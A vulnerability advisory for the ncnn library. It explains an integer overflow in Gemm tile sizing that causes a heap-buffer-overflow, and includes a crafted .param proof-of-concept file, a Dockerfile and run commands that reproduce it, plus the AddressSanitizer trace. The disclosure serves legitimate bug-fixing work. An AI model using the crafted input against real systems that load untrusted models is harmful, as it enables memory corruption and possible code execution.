GEMM Tile Size Integer Overflow Enables Heap Overflow
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:1030 in pack_B_tile
Sanitizer verdict: heap-buffer-overflow
Summary
A crafted .param file makes ncnnoptimize (via Net::load_model) allocate a GEMM prepacking buffer that is orders of magnitude smaller than the data subsequently written into it, giving a large controlled heap overflow. The Gemm layer's constant_TILE_N and constant_TILE_K parameters are multiplied as signed 32-bit ints to size BT_data; the product wraps, while the packing loops still copy the full untruncated tile. On an AVX-512 build the overflow is performed by 64-byte _mm512_storeu_ps stores in pack_B_tile.
Detail
Gemm::load_param reads constant_TILE_N = pd.get(21, 0); and constant_TILE_K = pd.get(22, 0); with no upper bound. When constantB is set, Gemm_x86::create_pipeline turns those into tile extents and sizes the packed-B buffer from their product:
// src/layer/x86/gemm_x86.cpp:6859
if (constant_TILE_N > 0)
{
#if __AVX512F__
TILE_N = (constant_TILE_N + 15) / 16 * 16;
// src/layer/x86/gemm_x86.cpp:7514
const int nn_N = (N + TILE_N - 1) / TILE_N;
const int nn_K = (K + TILE_K - 1) / TILE_K;
BT_data.create(TILE_K * TILE_N, nn_K, nn_N, 4u, (Allocator*)0);
TILE_K * TILE_N is an int * int multiplication. The PoC uses 21=66448 and 22=64640, both already multiples of 16 so the AVX-512 rounding leaves them unchanged. Their true product is 4,295,198,720, which exceeds 2^32; truncated to 32 bits it becomes 231,424. With constantN = constantK = 1000, nn_N and nn_K are both 1, so Mat::create allocates 231,424 floats — the 925,764-byte region ASan reports — instead of the ~17 GB the tile extents imply.
The packing loop that follows is driven by the real matrix dimensions, not by the truncated allocation: max_jj = std::min((N - j), TILE_N) is 1000 and max_kk = std::min((K - k), TILE_K) is 1000, so pack_B_tile walks 1,000,000 floats (4 MB) into the 925 KB buffer. With transB=1 (3=1) and elempack == 1, the 16x16 transpose path runs and the store at _mm512_storeu_ps(pp + 16, _r1) is the first write to cross the end of the region. The crash lands in build/src/layer/x86/gemm_x86_avx512.cpp, the AVX-512 specialisation generated from this same source file.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-gemm-tile-size-integer-overflow-enables-heap-overflow && cd ncnn-poc-gemm-tile-size-integer-overflow-enables-heap-overflow
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data
Gemm gemm 1 1 data out 3=1 5=1 8=1000 9=1000 21=66448 22=64640
PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x760bcd1fe840 at pc 0x60cad29999cf bp 0x7ffc2b816a30 sp 0x7ffc2b816a20
WRITE of size 64 at 0x760bcd1fe840 thread T0
#0 0x60cad29999ce in _mm512_storeu_ps(void*, float __vector(16)) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6368
#1 0x60cad29999ce in pack_B_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:1030
#2 0x60cad2a52cb1 in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7538
#3 0x60cacc3acc96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#4 0x60cacc2c0c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#5 0x760bcda051c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x760bcda0528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x60cacc240624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x760bcd1fe844 is located 0 bytes after 925764-byte region [0x760bcd11c800,0x760bcd1fe844)
allocated by thread T0 here:
#0 0x760bce07ef1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x60cacc31192d in fastMalloc /ncnn/src/allocator.h:62
#2 0x60cacc31192d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x60cad2a51421 in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7517
#4 0x60cacc3acc96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#5 0x60cacc2c0c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#6 0x760bcda051c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x760bcda0528a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x60cacc240624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6368 in _mm512_storeu_ps(void*, float __vector(16))
Credit
Zheng Yu @ DepthFirst